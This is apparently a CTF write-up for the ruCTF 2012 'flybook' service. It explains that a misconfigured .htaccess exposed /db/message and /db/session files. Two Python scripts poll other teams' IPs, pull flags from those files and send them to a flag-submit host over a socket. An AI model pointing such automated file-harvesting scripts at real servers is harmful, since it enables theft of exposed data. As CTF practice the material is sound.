Latest articles:

ruCTF 2012(flybook) writeup

category Hacking

Begin

The use of .htacces was not correctly configured and so one was able to access the files /db/message , /db/session and /db/? ,/db/message has a flag which is base64 encoded and can be easily decoded 

#!/usr/bin/env python
# -*- coding: latin-1 -*-
import base64
import socket
import time
import urllib

from thread import start_new_thread


def johannessub(flag):
    hostname = "192.168.*.*"
    port = 1337
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((hostname, port))
    s.sendall(flag + "\n")
    s.shutdown(socket.SHUT_WR)
    s.close()


def extraktflag(ip):
    submittedflags = []
    try:
        fweb = urllib.urlopen("http://" + ip[:-1] + "/db/message").read()
    except:
        return

    for i in fweb.split("\n"):
        index_begin = i.find("!!44!")
        if index_begin != -1:
            index_begin += len("!!44!")

            flag = i[index_begin : index_begin + 44]
            flag = base64.b64decode(flag)

            breaker = False
            for j in submittedflags:
                if j == flag:
                    breaker = True
                    break
            if breaker:
                continue
            johannessub(flag)


while True:
    f = open("group_ips.txt", "r")
    while True:
        line = f.readline()
        if line == "\n":
            continue
        if not line:
            break
        start_new_thread(extraktflag, (line,))

    time.sleep(60)

and submitted to the local flag submit service.

Nearly the same can be done for the sessions with the following script 

#!/usr/bin/env python
# -*- coding: latin-1 -*-
import socket
import time
import urllib

from thread import start_new_thread


def johannessub(flag):
    hostname = "192.168.*.*"
    port = 1337
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((hostname, port))
    s.sendall(flag + "\n")
    s.shutdown(socket.SHUT_WR)
    s.close()


def extraktflag(ip):
    submittedflags = []
    try:
        fweb = urllib.urlopen("http://" + ip[:-1] + "/db/session").read()
    except:
        return

    for i in fweb.split("\n"):
        if i[29:31] == "32":
            flag = i[32:64]
            breaker = False
            for j in submittedflags:
                if j == flag:
                    breaker = True
                    break
            if breaker:
                continue
            johannessub(flag)


while True:
    f = open("group_ips.txt", "r")
    while True:
        line = f.readline()
        if line == "\n":
            continue
        if not line:
            break
        start_new_thread(extraktflag, (line,))

    time.sleep(60)

Final Score: 1086

created on 25. November 2012